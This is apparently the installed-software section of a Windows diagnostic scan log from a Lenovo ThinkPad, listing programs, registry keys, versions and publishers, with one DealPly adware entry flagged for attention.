Fallout 3 (HKLM\...\{974C4B12-4D02-4879-85E0-61C95CC63E9E}) (Version: 1.00.0000 - Bethesda Softworks)
FCleaner 1.3.1.621 (HKLM\...\FCleaner_is1) (Version:  - FTweak, Inc.)
Foobar2000 v1.0.3 Final 汉化版 (HKLM\...\Foobar2000) (Version: v1.0.3 Final 汉化版 - Asion)
FormatFactory (HKLM\...\FormatFactory) (Version: 3.3.3.0 - FreeTime)
Foxit PDF Editor (HKLM\...\Foxit PDF Editor) (Version: 2.2.0.0205 - Foxit Software)
Foxit Reader (HKLM\...\Foxit Reader) (Version: 3.2.1.401 - Foxit Software Company)
Free PS Convert driver 8.15 (HKLM\...\Free PS Convert driver_is1) (Version:  - )
GIF Movie Gear 4.2.3 (HKLM\...\GIF Movie Gear_is1) (Version:  - gamani productions)
Google Chrome (HKLM\...\Google Chrome) (Version: 36.0.1985.125 - Google Inc.)
Google Talk (remove only) (HKLM\...\{226b64e8-dc75-4eea-a6c8-abcb496320f2}-Google Talk) (Version:  - )
Google Talk Plugin (HKLM\...\{C1E3DFE7-4EAD-3E9E-A826-E06055BA5921}) (Version: 5.4.2.18903 - Google)
Google Talk Plugin (HKLM\...\{DDB824DA-C431-3A3E-B997-F4B5539838FC}) (Version: 4.7.0.15362 - Google)
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.221 - SurfRight B.V.)
HP Officejet Pro 8600 基本设备软件 (HKLM\...\{D735EA8D-C454-45D7-8410-C17960989048}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Support Solutions Framework (HKLM\...\{C43602FE-988C-47BA-9F9F-B95FDDAFB624}) (Version: 11.50.0031 - Hewlett-Packard Company)
HydraVision (Version: 4.2.112.0 - ATI Technologies Inc.) Hidden
iCan3 (HKLM\...\iCan3) (Version: 1.0 - )
IE搜索助手 (HKLM\...\TXIEHlp) (Version: 3.0.3.2 - 腾讯公司)
Immunology Dictionary for CHS IME Web Release (Version: 1.0.0 - Microsoft) Hidden
Integrated Camera (HKLM\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.8.012 - Sonix)
Intel® Management Engine Interface (HKLM\...\HECI) (Version:  - Intel Corporation)
InterVideo Register Manager (Version: 1.0.4.0 - InterVideo Inc.) Hidden
InterVideo WinDVD (HKLM\...\{91810AFC-A4F8-4EBA-A5AA-B198BBC81144}) (Version: 5.0-B11.1243 - InterVideo Inc.)
IObit Malware Fighter (HKLM\...\IObit Malware Fighter_is1) (Version: 2.4 - IObit)
IObit Uninstaller (HKLM\...\IObitUninstall) (Version: 3.2.10.2466 - IObit)
IP Address Shield (HKLM\...\IP Address Shield) (Version:  - )
iTools (HKLM\...\iTools) (Version:  - 深圳市创想天空科技有限公司)
iTudou 2.7.2.1 (HKLM\...\iTudou) (Version: 2.7.2.1 - 土豆网)
iTunes (HKLM\...\{91FD46D2-4FB7-4A51-8637-556E1BE1DB7C}) (Version: 11.0.4.4 - Apple Inc.)
Japanese Fonts Support For Adobe Reader X (HKLM\...\{AC76BA86-7AD7-5760-0000-A00000000003}) (Version: 10.0.0 - Adobe Systems Incorporated)
Java Auto Updater (Version: 2.0.2.4 - Sun Microsystems, Inc.) Hidden
Java™ 7 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83217000FF}) (Version: 7.0.0 - Sun Microsystems, Inc.)
K-Lite Codec Pack 9.8.5 (Full) (HKLM\...\KLiteCodecPack_is1) (Version: 9.8.5 - )
Last.fm Scrobbler 2.1.35 (HKLM\...\LastFM_is1) (Version:  - Last.fm)
Lenovo Driver Update Control (HKLM\...\dueng) (Version:  - )
Lenovo Fingerprint Software (HKLM\...\{3D8994A3-02A8-45B5-B955-53E608BC69ED}) (Version: 3.2.0.341 - AuthenTec, Inc.)
Lenovo Welcome v1.0.24.3 (HKLM\...\Lenovo Welcome_is1) (Version:  - Lenovo)
LightScribe System Software  1.10.19.1 (HKLM\...\{59046D29-2E6B-4224-BF0D-64F3E7A93F7B}) (Version: 1.10.19.1 - http://www.lightscribe.com)
Magical Jelly Bean KeyFinder (HKLM\...\KeyFinder_is1) (Version: 2.0.8.2 - Magical Jelly Bean)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
MATLAB R2012a (HKLM\...\Matlab R2012a) (Version: 7.14 - The MathWorks, Inc.)
MemTest 4.0 (HKLM\...\MemTest) (Version: 4.0 - heat.ray(想oоО))
Message Center (HKLM\...\{E7E836B8-4BDD-454F-82E6-5FEA17C83AD4}) (Version: 2.01d - )
Message Center Plus (HKLM\...\{FD331A3B-F7A5-4C31-B8D4-DF413C85AF7A}) (Version: 2.0.0012.00 - Lenovo Group Limited)
Microsoft .NET Framework 3.5 Language Pack SP1 - chs (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 SP1 语言包 - 简体中文 (HKLM\...\Microsoft .NET Framework 3.5 Language Pack SP1 - chs) (Version:  - Microsoft Corporation)
Microsoft Application Error Reporting (Version: 12.0.6012.5000 - Microsoft Corporation) Hidden
Microsoft AppLocale (HKLM\...\{394BE3D9-7F57-4638-A8D1-1D88671913B7}) (Version: 1.0.0 - MS)
Microsoft Chart Controls for Microsoft .NET Framework 3.5 (KB2500170) (HKLM\...\{41785C66-90F2-40CE-8CB5-1C94BFC97280}) (Version: 3.5.30730.0 - Microsoft Corporation)
Microsoft Choice Guard (Version: 2.0.48.0 - Microsoft Corporation) Hidden
Microsoft Games for Windows - LIVE Redistributable (HKLM\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (Version:  - Microsoft) Hidden
Microsoft Office Access MUI (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office IME (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office IME (Chinese (Simplified)) 2010 (Version: 14.0.4999.3010 - Microsoft Corporation) Hidden
Microsoft Office IMESS (Chinese (Simplified)) 2010 (Version: 14.0.4999.3010 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Live Add-in 1.3 (HKLM\...\{57F0ED40-8F11-41AA-B926-4A66D0D1A9CC}) (Version: 2.0.2313.0 - Microsoft Corporation)
Microsoft Office Outlook MUI (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional Plus 2007 (HKLM\...\PROPLUS) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (Chinese (Simplified)) 2007 (Version: 12.0.4518.1016 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3) (Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20125.0 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft VC80 Support DLLs (Version: 1.0.0 - McNeel & Associates) Hidden
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM\...\{86CE1746-9EFF-3C9C-8755-81EA8903AC34}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Windows Application Compatibility Database (HKLM\...\{deb7008b-681e-4a4a-8aae-cc833e8216ce}.sdb) (Version:  - )
Microsoft XML Parser (Version: 8.70.1104.04 - Microsoft Corporation) Hidden
Microsoft XML 分析程序 (Version: 8.70.1104.04 - Microsoft Corporation) Hidden
Microsoft XNA Framework Redistributable 3.1 (HKLM\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Mobile Broadband Connect (HKLM\...\{2FAAD1C5-2D9D-4EDB-BCD1-FF6573986439}) (Version: 3.1.3050 - Lenovo)
MSNLite (HKLM\...\MSNLite) (Version: 2.2 - )
MSVC80_x86_v2 (Version: 1.0.3.0 - Nokia) Hidden
MSVCRT (Version: 14.0.1468.721 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Nero 8 Essentials (HKLM\...\{8D3FF1C3-0677-4A01-952E-6C9667772052}) (Version: 8.10.353 - Nero AG)
neroxml (Version: 1.0.0 - Nero AG) Hidden
Nitro PDF Reader (HKLM\...\{2881063B-C58F-49EB-97FD-8BF58EC580F9}) (Version: 1.4.0.11 - Nitro PDF Software)
Nokia Connectivity Cable Driver (HKLM\...\{6869591A-7DD8-46D2-837F-57CBF7358955}) (Version: 7.1.22.0 - Nokia)
Nokia PC Suite (Version: 7.1.40.1 - Nokia) Hidden
O&O Defrag Professional (HKLM\...\{CE2F467B-D1D2-4236-B80F-3E6A657FB695}) (Version: 14.1.425 - O&O Software GmbH)
OGA Notifier 1.7.0105.14.0 (Version: 1.7.0105.14.0 - Microsoft Corporation) Hidden
On Screen Display (HKLM\...\OnScreenDisplay) (Version: 5.12.00 - )
OpenAL (HKLM\...\OpenAL) (Version:  - )
Opera 10.51 (HKLM\...\{05ADEEC8-BD58-43D9-A9E3-1F53B0DA117A}) (Version: 10.51 - Opera Software ASA)
Origin85 (HKLM\...\{E0E49070-F2C7-402A-9D36-C9B87CA2E09D}) (Version: 8.50.000 - OriginLab Corporation)
Origin85 (Version: 8.50.000 - OriginLab) Hidden
P2pSearcher (HKLM\...\{EEDA1F1A-6E61-46AF-B3E8-2747E168A9BB}) (Version: 1.0.0 - libertarians)
PC Connectivity Solution (HKLM\...\{6E0352EE-6F0D-4FBC-B1B8-4FF032C78BE0}) (Version: 9.44.0.3 - Nokia)
PDF Password Remover v3.0 (HKLM\...\PDF Password Remover v3.0_is1) (Version:  - VeryPDF.com Inc)
Pharos (HKLM\...\Pharos) (Version:  - )
photoWORKS (HKLM\...\{9E1DB4FA-C8CB-48C7-A941-5E0864B5567D}) (Version: 1.00.000 - )
Picasa 3 (HKLM\...\Picasa 3) (Version: 3.9 - Google, Inc.)
Pirates Of The Caribbean At Worlds End Screen Saver (HKLM\...\Pirates Of The Caribbean At Worlds End) (Version:  - )
PPTV网络电视 V2.7.0.0031 (HKLM\...\PPLive) (Version: 2.7.0 - PPLive Corporation)
Presentation Director (HKLM\...\{65706020-7B6F-41F2-8047-FC69579E386A}) (Version: 4.00a - )
Primo (Version: 1.00.0000 - Your Company Name) Hidden
Product Recovery Disc Burning Utility (HKLM\...\{FA62B4C2-6CFD-462F-9B59-68A730001AB3}) (Version: 1.0.0019.00 - Lenovo Group Limited)
Productivity Center Supplement for ThinkPad (HKLM\...\{D728E945-256D-4477-B377-6BBA693714AC}) (Version: 3.00b - )
PunkBuster Services (HKLM\...\PunkBusterSvc) (Version: 0.986 - Even Balance, Inc.)
PX Profile Update (Version: 1.00.1. - AMD) Hidden
QQ旋风4.7 (HKLM\...\QQ旋风) (Version: 4.7.769.400 - 腾讯科技(深圳)有限公司)
QQ游戏 (HKLM\...\QQ游戏) (Version: 3.3.1.1 - 腾讯公司)
QuickTime (HKLM\...\{57752979-A1C9-4C02-856B-FBB27AC4E02C}) (Version: 7.69.80.9 - Apple Inc.)
RaySource 2.2.0.1 (HKLM\...\RaySource) (Version: 2.2.0.1 - RaySource Group)
Registry patch to improve USB device detection on resume from sleep for Windows Vista (HKLM\...\{4AB5764A-3894-49A2-BAA8-C4665F74CD4C}) (Version: 1.01.0000 - Lenovo Group Limited)
Rescue and Recovery (HKLM\...\{7E4C16B8-8F76-4940-8505-98E93C00BF19}) (Version: 4.23.0020.00 - Lenovo Group Limited)
ResearchSoft Direct Export Helper (HKLM\...\ResearchSoft Direct Export Helper) (Version:  - )
Resident Evil Extinction Screen Saver (HKLM\...\Resident Evil Extinction) (Version:  - )
RICOH R5C83x/84x Flash Media Controller Driver Ver.3.54.02 (HKLM\...\{59F6A514-9813-47A3-948C-8A155460CC2A}) (Version: 3.54.02 - )
Roxio Update Manager (HKLM\...\{30465B6C-B53F-49A1-9EBA-A3F187AD502E}) (Version: 6.0.0 - Roxio)
Ruijie Supplicant v3.95 (HKLM\...\{FDB88DAF-8DA4-4226-855B-1D816F37AE58}) (Version:  - )
Runtime (Version: 1.00.0000 - Your Company Name) Hidden
SILKYPIX Developer Studio 4.0 English (HKLM\...\InstallShield_{C223200D-631A-4C8A-8049-44946BB93ACA}) (Version: 4 - Ichikawa Soft Laboratory)
SILKYPIX Developer Studio 4.0 English (Version: 4 - Ichikawa Soft Laboratory) Hidden
Skins (Version: 2010.0504.2152.37420 - ATI) Hidden
Sonic Icons for Lenovo (HKLM\...\{B334D9AE-1393-423E-97C0-3BDC3360E692}) (Version: 2.0.0 - Lenovo)
Spelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)
STK02N 2.3 (HKLM\...\{E42E07F5-5A90-4BA9-B55A-79FCF9EAF9B5}) (Version: 2.3 - Syntek)
Subtitle Workshop 2.51 (HKLM\...\Subtitle Workshop) (Version: 2.51 - URUsoft Inc.)
Surfing Protection (HKLM\...\IObit Surfing Protection_is1) (Version: 1.0 - IObit)
System Migration Assistant (HKLM\...\{8A4DB1CA-8206-4ADC-805C-66ACF1611DA3}) (Version: 6.00.0010 - Lenovo Group Limited.)
System Update (HKLM\...\{8675339C-128C-44DD-83BF-0A5D6ABD8297}) (Version: 3.14.0024 - Lenovo)
Tencent QQMail Plugin (HKLM\...\QQMailPlugin) (Version:  - )
The KMPlayer (remove only) (HKLM\...\The KMPlayer) (Version: 3.9.0.127 - PandoraTV)
ThinkPad Bluetooth with Enhanced Data Rate Software (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.1.3100 - Broadcom Corporation)
ThinkPad EasyEject 实用程序 (HKLM\...\{1297C681-92D7-40EF-93BF-03F66EC5105C}) (Version: 2.36 - )
ThinkPad FullScreen Magnifier (HKLM\...\ThinkPad FullScreen Magnifier) (Version: 2.02 - )
ThinkPad Mobility Center Customization (HKLM\...\{90FABD40-E741-446F-839D-CEAE905D63BE}) (Version: 1.50.0000 - Lenovo)
ThinkPad Modem Adapter (HKLM\...\CNXT_MODEM_HDA_HSF) (Version: 7.73.00 - Conexant Systems)
ThinkPad Power Management Driver (HKLM\...\Power Management Driver) (Version: 1.64.00.00 - )
ThinkPad UltraNav Driver (HKLM\...\SynTPDeinstKey) (Version: 15.0.18.0 - )
ThinkPad Wireless LAN Adapter Software (HKLM\...\{9D3D2C60-A55F-4fed-B2B9-17394396DF01}) (Version: 1.00.0029.8 - REALTEK Semiconductor Corp.)
ThinkPad 电源管理器 (HKLM\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 2.33 - )
ThinkVantage Access Connections (HKLM\...\{4E2FA28A-2D17-41CC-AD11-12F428B2A273}) (Version: 5.85 - Lenovo)
ThinkVantage Active Protection System (HKLM\...\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}) (Version: 1.75 - Lenovo)
ThinkVantage Productivity Center (HKLM\...\{CF5737AF-8550-4546-A69B-0EA9EF5A9B55}) (Version: 3.00b - )
ThinkVantage Status Gadget (HKLM\...\{9CECB23C-F4BC-4FDA-A306-E544A216176A}) (Version: 1.0.3022 - Lenovo)
ThinkVantage Technologies Welcome Message (Version: 1.20 - ) Hidden
Transformers Screensaver (HKLM\...\Transformers Screensaver) (Version:  - )
Ulead GIF Animator 5 TBYB (HKLM\...\{8AF3E926-ED59-11D4-A44B-0000E86D2305}) (Version:  - Ulead System)
UltraEdit-32 v14.00a (HKLM\...\UltraEdit_is1) (Version:  - IDM Computer Solutions, Inc.)
Unlocker 1.9.1 (HKLM\...\Unlocker) (Version: 1.9.1 - Cedrick Collomb)
unnm=Version Checker for Dealply (HKCU\...\DealPly) (Version:  - ) <==== ATTENTION
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 suites (KB2596620) 32-Bit Edition (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{A024FC7B-77DE-45DE-A058-1C049A17BFB3}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596660) 32-Bit Edition (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{620E77C0-CDFE-4C14-AAEB-830ABB65864C}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596802) 32-Bit Edition (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{525A4A44-8940-40AD-ABA0-14501199D2F0}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596848) 32-Bit Edition (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{8153EC80-C988-4336-8DAF-6D99C0D26E0C}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{E9A82945-BA29-4EE8-8F2A-2F49545E9CF2}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (HKLM\...\{90120000-001A-0804-0000-0000000FF1CE}_PROPLUS_{E97580BE-C997-4428-A7A3-9AE01F85DDB4}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2768024) 32-Bit Edition (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{F5F9C863-59A7-40CA-8D86-E27D6B1D2617}) (Version:  - Microsoft)
VCRedistSetup (Version: 1.0.0 - Nero AG) Hidden
Verizon Wireless BroadbandAccess Self Activation (HKLM\...\{3F963A06-7C18-4039-9789-9644B3266AE7}) (Version: 1.3.2 - Smith Micro Software, Inc.)
Vista优化大师 (HKLM\...\VistaMaster) (Version:  - )
Wallpapers (Version:  - ) Hidden
Winamp (HKLM\...\Winamp) (Version: 5.7 Beta - Nullsoft, Inc)
Winamp Detector Plug-in (HKCU\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
Windows Driver Package - Broadcom (BTHUSB) Bluetooth  (04/08/2010 6.3.5.430) (HKLM\...\2004BB9EB6CEA02846881BEF1F51C11F7A90C9D6) (Version: 04/08/2010 6.3.5.430 - Broadcom)
Windows Driver Package - Broadcom HIDClass  (07/28/2009 6.2.0.9800) (HKLM\...\BF20603967CFDCB2BBF91950E8A56DFBC5C833FE) (Version: 07/28/2009 6.2.0.9800 - Broadcom)
Windows Driver Package - Intel (e1yexpress) Net  (03/27/2008 9.50.14.0) (HKLM\...\F99AE16996813DC11238C1670F2BA73C22AE6EAE) (Version: 03/27/2008 9.50.14.0 - Intel)
Windows Driver Package - Intel (iaStor) hdc  (07/22/2008 8.2.4.1005) (HKLM\...\3A4BCF4FDC99FD1314C1765462A054093CDEF58B) (Version: 07/22/2008 8.2.4.1005 - Intel)
Windows Driver Package - Intel hdc  (02/20/2008 6.9.1.1001) (HKLM\...\0A7603E3091C168CDE422A2B3481A2F7D17D0954) (Version: 02/20/2008 6.9.1.1001 - Intel)
Windows Driver Package - Intel System  (01/30/2008 8.6.1.1001) (HKLM\...\5A4D4FF375E24E41AE5D2D907E67E0884BE2CAF4) (Version: 01/30/2008 8.6.1.1001 - Intel)
Windows Driver Package - Intel System  (02/20/2008 8.6.1.1002) (HKLM\...\432D918ED17EA51B73E8491A0369730C0076A292) (Version: 02/20/2008 8.6.1.1002 - Intel)
Windows Driver Package - Intel System  (02/20/2008 8.7.0.1007) (HKLM\...\513C7D1BF4530B30EC84716327E4D7E76810DCC5) (Version: 02/20/2008 8.7.0.1007 - Intel)
Windows Driver Package - Intel System  (09/15/2006 7.0.0.1011) (HKLM\...\E6CEFD9A59425A2A27E92572AB367B28C371D3D8) (Version: 09/15/2006 7.0.0.1011 - Intel)
Windows Driver Package - Intel USB  (02/05/2007 8.3.0.1011) (HKLM\...\464CE3922A214073AAEE00DEB23EA5C750AF8CE8) (Version: 02/05/2007 8.3.0.1011 - Intel)
Windows Driver Package - Lenovo 1.45 (02/18/2008 1.45) (HKLM\...\386CAF2F8306A2DD7EBAEAA5A86D98BE177DC951) (Version: 02/18/2008 1.45 - Lenovo)
Windows Driver Package - Ricoh Company MMC Host Controller (02/15/2008 6.00.03.05) (HKLM\...\1205965EF392C9B0D5A9BDB139035F058E76359E) (Version: 02/15/2008 6.00.03.05 - Ricoh Company)
Windows Driver Package - Ricoh Company MS Host Controller (07/30/2007 6.00.01.11) (HKLM\...\1A96FF9D9E5F19776E6749D8F6557FCC437EB294) (Version: 07/30/2007 6.00.01.11 - Ricoh Company)
Windows Driver Package - Ricoh Company xD Host Controller (07/30/2007 6.00.01.13) (HKLM\...\778DAA8FB0D52FC214BC306BBDC33E26ACAB6F44) (Version: 07/30/2007 6.00.01.13 - Ricoh Company)
Windows Live Call (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Communications Platform (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live Essentials (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (HKLM\...\{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Messenger (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows 驱动程序包 - AuthenTec Inc. (ATSwpWDF) Biometric  (10/02/2008 8.1.2.37) (HKLM\...\A4680BD43717441189C52EBF2C4FD6B182EE1101) (Version: 10/02/2008 8.1.2.37 - AuthenTec Inc.)
Windows 驱动程序包 - Intel (NETw5v32) net  (09/15/2009 13.0.0.107) (HKLM\...\B70F914A99859243D67068AC4C47C1534B976B64) (Version: 09/15/2009 13.0.0.107 - Intel)
Windows 驱动程序包 - Nokia Modem  (06/01/2009 7.01.0.4) (HKLM\...\8CDCFB95BB84DD9C0F88F22266A0CA86035E55BA) (Version: 06/01/2009 7.01.0.4 - Nokia)
Windows 驱动程序包 - Nokia Modem  (10/05/2009 4.2) (HKLM\...\05B59228C7E1C21DFBE89260F879BD95880548D8) (Version: 10/05/2009 4.2 - Nokia)
Windows 驱动程序包 - Nokia pccsmcfd  (08/22/2008 7.0.0.0) (HKLM\...\504244733D18C8F63FF584AEB290E3904E791693) (Version: 08/22/2008 7.0.0.0 - Nokia)
Windows 驱动程序包 - Ricoh Company (risdptsk) hdc  (07/07/2009 6.03.02.28) (HKLM\...\F597F15415C5724D6442F5FBD0664D520174E93F) (Version: 07/07/2009 6.03.02.28 - Ricoh Company)
Windows修复助手 1.18 UNICODE (HKLM\...\Windows修复助手_is1) (Version: 1.18 - 苹果然工作室)
WinISO 5.3 (HKLM\...\WinISO_is1) (Version:  - WinISO Computing Inc.)
WinRAR 压缩文件管理器 (HKLM\...\WinRAR archiver) (Version:  - )
Word to PDF Converter 3.0 (HKLM\...\Word to PDF Converter_is1) (Version:  - PDF-Convert, Inc.)
YY3.9 (HKCU\...\YY3.9) (Version: 3.11.1.0 - 多玩游戏网)
Zero Assumption Recovery Version 9 (HKLM\...\Zero Assumption Recovery_is1) (Version:  - )
阿里旺旺2010 正式版SP1 (HKLM\...\阿里旺旺2010 正式版SP1) (Version:  - 阿里巴巴(中国)有限公司)
百度软件中心助手 1.3.0.3 (HKLM\...\BaiduRJDownloader) (Version: 1.3.0.3 - Beijing baidu Netcom science and technology co.ltd)
百度云管家 (HKLM\...\百度云管家) (Version: 4.6.1 - 百度在线网络技术(北京)有限公司)
帮助中心 (HKLM\...\{986F64DC-FF15-449D-998F-EE3BCEC6666A}) (Version: 2.00h - )
电精2  (HKLM\...\电精2) (Version:  - 多特软件站)
飞速土豆 1.40.19.0 (HKLM\...\飞速土豆) (Version: 1.40.19.0 - 土豆网)
格调网精品Vista主题美化包 V1.0(完美装机版)  (HKLM\...\格调网精品Vista主题美化包 V1.0(完美装机版)) (Version:  - dzART)
格调网精品主题美化包  (HKLM\...\格调网精品主题美化包) (Version:  - dzART)
格调网明星主题之周杰伦三国无双  (HKLM\...\格调网明星主题之周杰伦三国无双) (Version:  - dzART)
光盘刻录大师  6.0 (HKLM\...\{E282A694-F6F9-46DC-AFA4-023EEF09708F}_is1) (Version: 6.0 - 北京锐动天地信息技术有限责任公司)
红蜻蜓抓图精灵 v2.08 build 20100101 (HKLM\...\红蜻蜓抓图精灵_is1) (Version: 2.08 build 20100101 - 非常软件(北京)工作室)
华为网盘 (HKLM\...\华为网盘Beta) (Version: Beta - 华为软件技术有限公司)
极速酷6 (HKLM\...\Ku6SpeedUpper) (Version:  - )
可牛急救箱 2.0 (HKLM\...\{F49B7E2B-0551-429C-B317-14B7D374D6EC}_is1) (Version:  - Conew Corporation.)
酷狗音乐2012 (HKLM\...\酷狗音乐2012) (Version: 7.3.14.9257 - 酷狗音乐)
酷我K歌 (HKLM\...\KwSing) (Version:  - 酷我科技)
联想驱动下载管理器 (HKCU\...\90c40edc90b67eca) (Version: 2.0.0.169 - 联想.中国)
美图秀秀 3.8.0  (HKLM\...\美图秀秀) (Version:  - 美图网)
木马清除大师防火墙2012 (HKLM\...\木马清除大师防火墻2012) (Version: V7.0 - Lofocus安全实验室)
千千静听 5.7正式版 (HKLM\...\TTPlayer) (Version: 5.7正式版 - Alen Soft)
秋无痕论坛精品主题美化包 for Vista 2008 v1.0 (HKLM\...\秋无痕论坛精品主题美化包 for Vista 2008 v1.0) (Version:  - )
